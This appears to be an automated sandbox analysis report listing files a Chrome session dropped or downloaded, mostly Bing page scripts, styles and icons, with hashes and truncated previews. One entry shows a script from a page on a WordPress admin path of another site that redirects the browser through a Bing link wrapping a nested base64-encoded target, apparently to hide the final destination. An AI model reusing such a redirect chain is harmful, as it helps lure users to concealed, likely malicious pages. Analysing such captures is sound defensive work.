                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (667), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):667
                                                                                                      Entropy (8bit):5.251512275863699
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:fr5esz7hNGwXI2QA3QglxfLQOtKfWM1kI2JGC+t5821xw9i/UJpN0I:fr5NhNGOgAggDDQOtjMbhH582Ugk0I
                                                                                                      MD5:2AB12BF4A9E00A1F96849EBB31E03D48
                                                                                                      SHA1:7214619173C4EC069BE1FF00DD61092FD2981AF0
                                                                                                      SHA-256:F8B5ACF4DA28E0617F1C81093192D044BD5A6CC2A2E0C77677F859ADCF3430AC
                                                                                                      SHA-512:7D5AAE775BE1E482EADA1F453BEA2C52A62C552FA94949E6A6081F322E679E916B1276BB59FF28CF7C86D21727BCC329ECB03E5D77CA93204E0CD2694FAA72BD
                                                                                                      Malicious:false
                                                                                                      Preview:sb_ie&&function(){function h(){if(t){var u=n.replace(/www\./i,"");return f&&i(t,r,n+"?PC="+f)||i(t,r,n)||i(t,r,u)||i(t,r,n+"?Form=HPPDH1")||i(t,r,n+"?PC=BNHP")||i(t,r,n+"?PC=BNSR")}return 0}function c(){return i(_w.external,s,n)!=0}function l(){if(u){var n=2*e+o;if(u==n)return!0}return!1}function a(){var n=_ge("hps");return n||(n=sj_ce("span","hps"),n.style.behavior="url(#default#homepage)",sj_b.appendChild(n)),n}function i(n,t,i){try{return n[t](i)}catch(r){return 0}}var s="IsSearchProviderInstalled",r="isHomepage",n="http://"+_d.domain+"/",u=sj_cook.get("_UR","D"),f=sj_cook.get("SRCHS","PC"),t=a(),e=h(),o=c();l()||(u=2*e+o,sj_cook.set("_UR","D",u,1,"/"))}()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1274), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1274
                                                                                                      Entropy (8bit):5.30620342636407
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+Fq4YTsQF61KWllWeM2lSoiLKiUfpIYdk+fzWPn8X0kdo6QBUf4JPwk:+FGF6UYXEBi9k5P8OPUY
                                                                                                      MD5:A969230A51DBA5AB5ADF5877BCC28CFA
                                                                                                      SHA1:7C4CDC6B86CA3B8A51BA585594EA1AB7B78B8265
                                                                                                      SHA-256:8E572950CBDA0558F7B9563CE4F5017E06BC9C262CF487E33927A948F8D78F7F
                                                                                                      SHA-512:F45B08818A54C5FD54712C28EB2AC3417EEA971C653049108E8809D078F6DD0560C873CEB09C8816ECD08112A007C13D850E2791F62C01D68518B3C3D0ACCCEB
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/fEzca4bKO4pRulhVlOoat7eLgmU.js
                                                                                                      Preview:var Identity=Identity||{};(function(n,t,i,r,u,f,e){e.wlProfile=function(){var r=sj_cook.get,u="WLS",t=r(u,"N"),i=r(u,"C");return i&&e.wlImgSm&&e.wlImgLg?{displayName:t?t.replace(/\+/g," "):"",name:n(t.replace(/\+/g," ")),img:e.wlImgSm.replace(/\{0\}/g,f(i)),imgL:e.wlImgLg.replace(/\{0\}/g,f(i)),idp:"WL"}:null};e.headerLoginMode=0;e.popupAuthenticate=function(n,i,r){var o,u,h,c,v=sb_gt(),l=Math.floor(v/1e3).toString(),s="ct",a=new RegExp("([?&])"+s+"=.*?(&|$)","i");return n.toString()==="WindowsLiveId"&&(o=e.popupLoginUrls,u=o[n],u=u.match(a)?u.replace(a,"$1"+s+"="+l+"$2"):u+"?"+s+"="+l,e.popupLoginUrls.WindowsLiveId=u),(o=e.popupLoginUrls)&&(u=o[n]+(i?"&perms="+f(i):"")+(r?"&src="+f(r):""))&&(h=e.pop(u))&&(c=setInterval(function(){h.closed&&(t.fire("id:popup:close"),clearInterval(c))},100))};e.pop=function(n){return r.open(n,"idl","location=no,menubar=no,resizable=no,scrollbars=yes,status=no,titlebar=no,toolbar=no,width=1000,height=620")};var s=u("id_h"),o=u("id_l"),h="click";t.bind("o
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (2014), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2016
                                                                                                      Entropy (8bit):5.3161096027675105
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:bnXL8sjfZ/Fslrgj3rzIRlK0KqoLi7XSOLFTt+jCz1T9XNZTs3Gan/An0:bnoshqlMQRlZTolKOEXNZsWan/An0
                                                                                                      MD5:D807DBBB6EE3A78027DC7075E0B593FF
                                                                                                      SHA1:27109CD41F6B1F2084C81B5D375EA811E51AC567
                                                                                                      SHA-256:0ACDCE370092C141B0C6617ED6E2163F04BB9B93D3213B62C2BC7A46FE0243C7
                                                                                                      SHA-512:E037DFC31D595B459660FE7D938EEDB4F43D208D247174EE8D6FD0D125F211142CD73497E4601893CECB6F565B7E2E7815CE416D72BB95504D3F277E4E806D11
                                                                                                      Malicious:false
                                                                                                      Preview:var SerpKeyboardNavigation;(function(){function c(){h=_d.activeElement;n=null;u=null;e=!1;t=-1;nt();u=_w.NavSelector&&NavSelector(!1)}function p(){v();n=null}function w(i){var e,h,o;i&&(e=_d.activeElement,h=s&&e&&e.className&&e.className.indexOf("feedback-binded")!==-1,i.keyCode==r.Tab&&s&&(f("TOP"),s=!1),u&&e&&e.className!=="b_searchbox"&&!h&&(i.keyCode==r.Enter?(n=null,f(t==-1?"EN":"EE",t)):b(i)&&(o=k(i.keyCode),o!==-1&&o!==t&&(tt(o),sj_pd(i)))))}function f(n,t){sj_log("CI.SerpKeyboardNav",n,t?t.toString():"")}function b(t){var i,r=(i=_d.querySelector("#b_sydConvCont cib-serp"))===null||i===void 0?void 0:i.getAttribute("mode");return n||h==_d.activeElement?t.altKey||t.ctrlKey?!1:r&&["conversation","notebook"].includes(r)?!1:!0:!1}function k(n){if(n===r.Tab)return d();if(n===r.Down||n===r.Up){var t=document.activeElement;return t&&(t.tagName.toLowerCase()==="select"||t.tagName.toLowerCase()==="input")?-1:g(n===r.Down)}return-1}function d(){var i=-1;return n?(v(),e=!0,t=-1,f("TO")):(i=
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (19008)
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):316988
                                                                                                      Entropy (8bit):5.239088634343518
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:vLKLj7yjWF276GNg9fpe3HdabIKSB1DkCXW8o0oMlppfbm:zgj7bSB1DkCXW8T5dbm
                                                                                                      MD5:8192D891E754AFD81A399F98BC6B265F
                                                                                                      SHA1:965E6C69F45118FEAB86EEEBBB0FC4964F2B3A98
                                                                                                      SHA-256:E2E4D97C20D4478E8E947480C8F6C71A2C795776D405366BE70DB82E4EA4BA77
                                                                                                      SHA-512:7C2712A1E34DA9062F50E7D93F4E74772044E45C265C682ABCD4E28E4004DCDAF6CE7479A4E8785986A88A32257E4FAC0ECF8CE23AFE47968C4510DF0A2C800B
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/ll5safRRGP6rhu7ruw_Elk8rOpg.js
                                                                                                      Preview:/*! @azure/msal-browser v2.28.2 2022-09-06 */."use strict";!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports):"function"==typeof define&&define.amd?define(["exports"],t):t((e="undefined"!=typeof globalThis?globalThis:e||self).msal={})}(this,(function(e){./*! *****************************************************************************. Copyright (c) Microsoft Corporation... Permission to use, copy, modify, and/or distribute this software for any. purpose with or without fee is hereby granted... THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH. REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY. AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,. INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM. LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR. OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:exported SGML document, Unicode text, UTF-8 text, with very long lines (65522), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):65783
                                                                                                      Entropy (8bit):5.269594649055448
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:Ede0TbABOts87O7vxBdpgnBOkcvM/uDFyB2YJFgFlVn2vVXOaI+QT4atlh93lU3c:np4BJ/Vbf0EArt13O382rVEXHbJh
                                                                                                      MD5:32F90061ECEF93C8AE5EE5B4880C7B20
                                                                                                      SHA1:A4E33B7C1F72891D7209067CE87E67BEE17AD532
                                                                                                      SHA-256:07FC64224B3F4036021A30C1F3DCA5CC6472D2C5BD9733262DDFD40940C4A2B4
                                                                                                      SHA-512:153200B9A9E288D129CB23999138BB9B10DAE8DF41BFCE667184F7C1C486428D21F7D6447528E8B812C246D35576344DC911454C9E74B8B35D8C9BC76BCBA2BA
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/pOM7fB9yiR1yCQZ86H5nvuF61TI.js
                                                                                                      Preview:define("Types/SuggestionTypes",["require","exports"],function(n,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0});t.SuggestionExpansionType=void 0;var i;(function(n){n[n.NO_EXPANSION=0]="NO_EXPANSION";n[n.REQUERY_EXPANSION=1]="REQUERY_EXPANSION";n[n.ZIS_EXPANSION=2]="ZIS_EXPANSION";n[n.QF_EXPANSION=3]="QF_EXPANSION"})(i=t.SuggestionExpansionType||(t.SuggestionExpansionType={}))});define("Types/CoreTypes",["require","exports"],function(n,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0})});define("Utilities/SuggestionUtilities",["require","exports"],function(n,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0});t.escapeHTML=t.processSuggestionResponse=t.setPanelValue=t.createSuggestionBlock=t.chatBannerSuggestion=t.isUserSignedIn=t.hasHistorySuggestion=t.onClickHandler=t.updateSearchBoxValueOnHover=t.getNextSelectedSuggestion=t.getHValueFromId=t.convertHighlightedQueryToPlainQuery=t.convertHighlightedQueryToHtml=void 0;const i=/\./g,r=/\./g,
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (429), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):429
                                                                                                      Entropy (8bit):5.098203134109495
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:GtAJv9xWHXWpwYMEX3IR6lVDZWhHD6GkPsHKHOZzu2wBRHJhNURtAJ4ZQetAJD:GeyWeYMEnsUVoHoigkhwBRphNQR+e+
                                                                                                      MD5:0794C2FFC9AAF238496BF687A9C68799
                                                                                                      SHA1:7938BE485611F9D417E84B8C0A74BD3C589E052F
                                                                                                      SHA-256:805AAA9634639B2EAA912E117219727DFA6E92A63B8B92569C336A9CCDE52DEE
                                                                                                      SHA-512:FEFBFBD39B9B86D8975D8FAAB62B50515488E9BF1E21AD72FED9FA93614E10ADAFC99DA77349EAD2501B89D422D766ADC313B6024BCB9B331AB83A7B99BB135F
                                                                                                      Malicious:false
                                                                                                      Preview:var SBIImgsHelper;(function(){function i(){typeof SbiUtil!="undefined"&&(SbiUtil===null||SbiUtil===void 0?void 0:SbiUtil.oncop(SbiUtil.rt,r))}function r(i){var r=i.target||i.srcElement,u;r&&r.tagName==="IMG"&&r.classList.contains(n)&&r.src&&(u=r.getAttribute(t),u&&sj_evt&&sj_evt.fire&&sj_evt.fire("sbi_searchimgurl",SbiUtil.gimg(r),u,null,SbiUtil.gaps(r)))}var n="sbiable",t="data-sbiid";i()})(SBIImgsHelper||(SBIImgsHelper={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (7179)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7180
                                                                                                      Entropy (8bit):5.161749091368312
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:HA1SI+LtL5XIr10Tjyf8J+Bz9NgR51fuPKZs7f/:g1SIiXhqabao6/
                                                                                                      MD5:8E28DB3A65522AE2012DE9ADCE4DE5BF
                                                                                                      SHA1:84EA63544DA64A2355256B0BAE973AE1EAE04CE6
                                                                                                      SHA-256:ADF7F9B0DD938575C72FF1592EA18E7AB9BC53FF8838A38C8484C10F5D9BE7FD
                                                                                                      SHA-512:4319C5B3C4B880ADE6E25B28609A14152389CC8D835AD213D58984153C3E7FF8718B2829A330A7EA4F2C11DB68C358438563FB301D9D6240BF833CEE1462756C
                                                                                                      Malicious:false
                                                                                                      Preview:var webVitals=function(e){"use strict";var n,t,r,i,o,a=-1,c=function(e){addEventListener("pageshow",(function(n){n.persisted&&(a=n.timeStamp,e(n))}),!0)},u=function(){var e=self.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0];if(e&&e.responseStart>0&&e.responseStart<performance.now())return e},s=function(){var e=u();return e&&e.activationStart||0},f=function(e,n){var t=u(),r="navigate";a>=0?r="back-forward-cache":t&&(document.prerendering||s()>0?r="prerender":document.wasDiscarded?r="restore":t.type&&(r=t.type.replace(/_/g,"-")));return{name:e,value:void 0===n?-1:n,rating:"good",delta:0,entries:[],id:"v4-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:r}},d=function(e,n,t){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var r=new PerformanceObserver((function(e){Promise.resolve().then((function(){n(e.getEntries())}))}));return r.observe(Object.assign({type:e,buffered:!0},t||{})),r}}catch(e
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (883), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):883
                                                                                                      Entropy (8bit):5.1977042667779445
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Hl7/nJ4aZUv+MW/sRdrwq50n+pM12vA4W3Idc4Wn:d/Caq+M93H5kOS3Idmn
                                                                                                      MD5:FD88C51EDB7FCFE4F8D0AA2763CEBE4A
                                                                                                      SHA1:18891AF14C4C483BAA6CB35C985C6DEBAB2D9C8A
                                                                                                      SHA-256:51F58A23F7723B6CBD51B994CB784FBC2A4AB58442ADAEDA6C778F648073B699
                                                                                                      SHA-512:FFE417FA00113273FE7AC1B1BD83C98A3A9DC12D41C77B60C52CC5FFD461D9CA2020C2444AC43771D737C70C58ECA40786A5C5762B60F30DA523F709684510DF
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/GIka8UxMSDuqbLNcmFxt66stnIo.js
                                                                                                      Preview:var HeaderPlusAlgo_Selector;(function(n){function e(n){for(var u,l,h,e=[],c=t(sj_b.querySelectorAll(f+(n?", :focus":""))),s=0;s<c.length;s++)u=c[s],u.className.indexOf("b_ans")!=-1||u.id=="b_pole"?(l=t(u.querySelectorAll(r)),l.length==0&&(h=o(u),h&&e.push(h))):i(u)||e.push(u);return e}function t(n){for(var i=[],t=0;t<n.length;t++)i.push(n[t]);return i}function i(n){if(n){var t=window.getComputedStyle(n);return t&&t.display=="none"?!0:i(n.parentElement)}return!1}function o(n){for(var r,e=t(n.querySelectorAll(u)),f=0;f<e.length;f++)if(r=e[f],!i(r)&&r.tabIndex!=-1)return r;return null}var r="#b_results h2 a,#b_results h3 a,#b_results h4 a",u="input, select, textarea,a[href],*[tabindex = '0']",f=r+",#b_results .b_ans,#b_content #b_pole";n.getSelectableElements=e})(HeaderPlusAlgo_Selector||(HeaderPlusAlgo_Selector={}));NavSelector=HeaderPlusAlgo_Selector.getSelectableElements
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (4972), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4972
                                                                                                      Entropy (8bit):5.375879110370942
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:in5ZmrbQ9qs1EYyLyhjOreag9n9wwFvtY4keJrSzyXCrut5zlD:in5ZmXQgs1EYyetOEp9ZFvVk6ByrutVd
                                                                                                      MD5:43B58B6B14B60581457EF8A405721626
                                                                                                      SHA1:FA9DA729B92847CC05AD81625B5667F299B75C08
                                                                                                      SHA-256:CEF3B449403A4725A3866768F730E13F1BDDEC067CC67F306F023DE2815A2789
                                                                                                      SHA-512:4C22EC83B8A81E0716C4EA9C643CFB4C4F9256447A114B7B0E05C0B38BC073F4A0538E2A385E963B3E2634EF34F66050AC2C36801772A345670409BE8FD2E829
                                                                                                      Malicious:false
                                                                                                      Preview:(function(){function u(n){var e=fab_config&&fab_config.fabSbActionHover,o=fab_config&&fab_config.FabAddSuggestions,u,r,f,i;if(_w.sj_log&&sj_log("CI.Fab","hover","1"),e==="Expand")if(t||fab_config.fabSbActionData!=="AutoSuggest"){if(t||fab_config.fabSbActionData!=="RelatedSearch")o&&document.getElementsByClassName("b_fabHide").length===0?(t.style.display="flex",sb_st(function(){t.style.transform="scaleX(1)"},50)):t.style.transform==="scaleX(0)"&&document.getElementsByClassName("b_fabHide").length===0&&(t.style.display="flex",sb_st(function(){t.style.transform="scaleX(1)"},50));else if(_w.sj_log&&sj_log("CI.FabRS","hover","1"),u=_d.getElementsByClassName("b_rs"),u.length>0){for(r=u[0].getElementsByTagName("a"),f=[],i=0;i<r.length;i++)f.push({html:r[i].innerHTML,url:r[i].getAttribute("href"),src:"RS"});v(f)}}else{_w.sj_log&&sj_log("CI.FabAS","hover","1");var s=typeof URLSearchParams=="undefined"?d("q"):new URLSearchParams(_w.location.search).get("q"),l="&mkt="+_G.Mkt,h="&query="+s,c="as/a
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1101
                                                                                                      Entropy (8bit):4.829151166001716
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:t0S8eLfl954T0u2y3EO1gRcDrIvQaDxijjfscC:vLfRWtPDuQKIjq
                                                                                                      MD5:91CD11CFCCA65CFACE96153268D71F63
                                                                                                      SHA1:E0BE107728D3BF41D8136220DA897D798A2AC60F
                                                                                                      SHA-256:8EE1E6D7A487C38412D7B375AC4A6BD7E47F70858055EEB7957226ADA05544BE
                                                                                                      SHA-512:4367CE147C7FA4590838F23C47819B8954858128336979E28BA116924B92660A7CBDC9A8292C45C5F26FF591F423F03DFADCB78A772DBE86AC5FBABF0B4E7711
                                                                                                      Malicious:false
                                                                                                      Preview:<svg focusable="false" width="24px" height="24px" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <rect fill-opacity="0.2" fill="#000" x="0" y="0" width="24" height="24" rx="2"></rect>.. <g transform="translate(4, 4)">.. <path d="M13.2916881,1.29304814 L7.99395739,6.59077883 L2.69622669,1.29304814 C2.30349711,0.913737214 1.67923378,0.919161894 1.29315522,1.30524045 C0.907076669,1.691319 0.90165199,2.31558234 1.28096291,2.70831192 L6.57869361,8.00604261 L1.28096291,13.3037733 C0.90165199,13.6965029 0.907076669,14.3207662 1.29315522,14.7068448 C1.67923378,15.0929233 2.30349711,15.098348 2.69622669,14.7190371 L7.99395739,9.42130639 L13.2916881,14.7190371 C13.6844177,15.098348 14.308681,15.0929233 14.6947596,14.7068448 C15.0808381,14.3207662 15.0862628,13.6965029 14.7069519,13.3037733 L9.40922117,8.00604261 L14.7069519,2.70831192 C15.0976827,2.31746305 15.0976827,1.683897 14.7069519,1.29304814 C14.316103,0.902317288 13
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):726
                                                                                                      Entropy (8bit):4.636787858533541
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:tbH41nlcWYiB1+Xl0ML2t1iOfEmmgaUEUZQ6nMAIPWSxs4yPISEIe9t8aayPISEx:t741nTYifqLL2+O7mgaxSQ6MFnE3nkO
                                                                                                      MD5:6601E4A25AB847203E1015B32514B16C
                                                                                                      SHA1:282FE75F6FED3CFC85BD5C3544ADB462ED45C839
                                                                                                      SHA-256:6E5D3FFF70EEC85FF6D42C84062076688CB092A3D605F47260DBBE6B3B836B21
                                                                                                      SHA-512:305C325EAD714D7BCBD25F3ACED4D7B6AED6AE58D7D4C2F2DFFCE3DFDEB0F427EC812639AD50708EA08BC79E4FAD8AC2D9562B142E0808936053715938638B7C
                                                                                                      Malicious:false
                                                                                                      Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" enable-background="new 0 0 16 16">.. <path d="M0 0h16v16h-16v-16z" fill="none"/>.. <path fill="#007DAA" d="M11 4h4l-5-4v3c0 .552.447 1 1 1zm-3-1v-3h-4.5c-.828 0-1.5.672-1.5 1.5v13c0 .828.672 1.5 1.5 1.5h10c.828 0 1.5-.672 1.5-1.5v-8.5h-4c-1.654 0-3-1.346-3-3zm4.707 10.707c-.181.181-.431.293-.707.293h-7c-.276 0-.526-.112-.707-.293s-.293-.431-.293-.707.112-.526.293-.707.431-.293.707-.293h7c.276 0 .526.112.707.293s.293.431.293.707-.112.526-.293.707zm0-5.414c.181.181.293.431.293.707s-.112.526-.293.707-.431.293-.707.293h-7c-.276 0-.526-.112-.707-.293s-.293-.431-.293-.707.112-.526.293-.707.431-.293.707-.293h7c.276 0 .526.112.707.293z"/>..</svg>
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:HTML document, ASCII text, with very long lines (402), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):402
                                                                                                      Entropy (8bit):5.744229936109548
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:udGKxHtub8iffAiddVomoc5+Mzgt1U0Bb:Fkub829d6mBzL0Bb
                                                                                                      MD5:B3B905B8E72E35D61F828CEB056C04BE
                                                                                                      SHA1:2C0B5C6B8296EBFEF39216D8FF0A7BB20DAFEC1F
                                                                                                      SHA-256:B545C27A54E68A5FEB78954C8065457A77F860B32C9922E28E5ED1A8D0AF278A
                                                                                                      SHA-512:8ED797C270713B5A57893E087C795F04D222EFAD51C5037C651EFCEB1ECA184B1ECB1295788F86AC4C9FA3EB8588339236BD4DA67A6AAB1E52B4C8DA3AD2FB8B
                                                                                                      Malicious:false
                                                                                                      URL:https://clinicaaryal.com/wp-admin/maint/404.php
                                                                                                      Preview:<script>window.top.location.href = "https://r.g.bing.com/bam/ac?!&&u=a1aHR0cHM6Ly9yLmcuYmluZy5jb20vYmFtL2FjPyEmJnU9YTFhSFIwY0hNNkx5OXlMbWN1WW1sdVp5NWpiMjB2WW1GdEwyRmpQeUVtSm5VOVlURmhTRkl3WTBoTk5reDVPV3hpUjJ3d1dsZGFNV015YkhaaWFUVjZXVk0xYW1JeU1IWmFSM1JvV1d0amRtRlhOV3RhV0dkMVlVaFNkR0pEVFhkWFZtUlRZa2RPZEdKSGNHaE5SVXB5VjJ4b1MyTkdhM2xrUjNSaFYwVndNRmRXYUZOa2JVcElUMWMxYkZWNlZuRlpha2wzVUZFOVBRPT0=";</script>
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:51:08], progressive, precision 8, 160x158, components 3
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):4547
                                                                                                      Entropy (8bit):7.735536921390623
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:ssb41dk9JozAQ8d2SuBK76KrZDoDBtnFKiDo8TzNnNJSHvLPS:sj1eozAQ8d2VPGoBBFfM4fJSHDPS
                                                                                                      MD5:7AEF4CCF6E47B9BA038365CD3D1F5693
                                                                                                      SHA1:71F7957F6FAE574854A374E84DB2E3CEDBA89969
                                                                                                      SHA-256:08102BA7A0388B1AFC9A351B3387B2DDEDA846551303170E0273B2F305AECCB2
                                                                                                      SHA-512:29AC1E6BADF62C61B4FA889EA1B0436D3B9107A60BA03801DFA8E23A4D8BCCF42C09BB7CC7E6CD9FACB8D140DB7E0D4F0EEB3D7D8A3B9B38B1D2B95113005320
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/cfeVf2-uV0hUo3ToTbLjztuomWk.jpg
                                                                                                      Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:51:08....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;...........................................................................................VQJ,..R...)..(..R..d.Y@...h..%(.AW(T.)...5.,.%.2[.."*!l...Z......@I..T.......@3.@....D@ ..l.)E.P....ts......@... E".W/G...........IQ..I|../.,..W..(....WY.1<.t..=....K...C....-.1..s.[l...^].mO7|..:.kda5....o.=.S.8.;....~e,.......1v..~5.:s'$..u.i..k.7._E25...f6v..Nk.&)....S.r...ovn5...k9k...u.D...f&.......e.+.7......d..7K.R]..f..K..l...r...*.K.b..s29...y;..U.E(.qH....,....QS%..@....'......................... !."1.#$0@.`............R.J..e~...+.J.....y..7#..^....,.....@.3..`.....L...[u.!.../...*;[7.,...a....[._W...B;.....4g+../c..>g...!..U..Q...0...$..F%...u|.2?.V.>.v..2.2.S.c..km)
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):289
                                                                                                      Entropy (8bit):4.88926455834166
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:2LGXO86zKFddXQOa65Em/L6I38TcqLcUCPrWqpOlZXzPlg3X6:2QO8vzdXmMPTiAiXzC3X6
                                                                                                      MD5:9085E17B6172D9FC7B7373762C3D6E74
                                                                                                      SHA1:DAB3CA26EC7A8426F034113AFA2123EDFAA32A76
                                                                                                      SHA-256:586D8F94486A8116AF00C80A255CBA96C5D994C5864E47DEAC5A7F1AE1E24B0D
                                                                                                      SHA-512:B27B776CB4947EEF6D9E2A33B46E87796A6D4C427F4759C08CF5AA0EE410A5F12E89CA6AB9CDDD86C8471037E3C505F43C8B7FC6D8417F97F9FE3C5C47216BC4
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/2rPKJux6hCbwNBE6-iEj7fqjKnY.js
                                                                                                      Preview:(function(){if("BroadcastChannel"in window){var t=1,n=new BroadcastChannel("tabCountBroadCastChannel");n.onmessage=function(i){i.data=="newTab"&&n.postMessage("existingTab");i.data=="existingTab"&&t++};n.postMessage("newTab");sb_st(function(){Log.Log("Tab","count",t.toString())},200)}})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (715), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):715
                                                                                                      Entropy (8bit):5.032953809282417
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:iggpIYa1gjMPRuQR6uqRa+IARLzayARSASBI4AM1mAu0AkgO3AiDMvTAD0xpmDO1:IIbR6uqRTxLzayARSnBP3EH0lgCmvTAo
                                                                                                      MD5:ACA7B62EF304E4E17941914622BF3A91
                                                                                                      SHA1:0D66F41D9084A43DD339DFA584D0C44FC3C438E3
                                                                                                      SHA-256:A4579184B85367432CE944BC8652024345BA631B3E16BCF6330A9BE1C45C1591
                                                                                                      SHA-512:7BF21542A5B092D32ED1BEE229447BAECDB9C2E9BDC4EC7F6CD7101F84CE67039E2142AC6413B9A231A77A427E8959B99EDBD2445C293AF54C0135C7C303C344
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/DWb0HZCEpD3TOd-lhNDET8PEOOM.css
                                                                                                      Preview:#bepfo{background-color:#fff !important;color:#444 !important;z-index:10}#bepfo.b_hide{display:none !important}#bepfo.darkMode{background-color:#11100f !important;color:#edebe9 !important}#bepfo #bepfm{max-width:320px;overflow:hidden;box-sizing:border-box;border-radius:4px}.rwspotlight{padding-right:376px}@media only screen and (max-width:1307px){.rwspotlight{padding-right:0}}.popup{transform:scale(0);transform-origin:center top;animation-name:autoOpenPopup;animation-duration:300ms;animation-delay:200ms;animation-timing-function:linear;animation-fill-mode:forwards}@keyframes autoOpenPopup{0%{transform:scale(0)}30%{transform:scale(.3)}50%{transform:scale(.5)}80%{transform:scale(.8)}100%{transform:scale(1)}}
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (21920)
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):21951
                                                                                                      Entropy (8bit):5.3573914200107335
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:Kh4kT1lYxfqyDOhKMpWMEVhbTDDoFWZ3BnqIfP5IDV6s4RKAwKXvUNuw+0wzueAi:Y5Tifh3bBpBnqIH+Z6sepXv0uQaV
                                                                                                      MD5:51775361FD842E7E41AF84A01C8AB92C
                                                                                                      SHA1:21D108490F70991727A3B044983342517336B53F
                                                                                                      SHA-256:8B549EEF372338FC3F5632B9BD47AD2C2876229E573095CCBC6B7867A47153F9
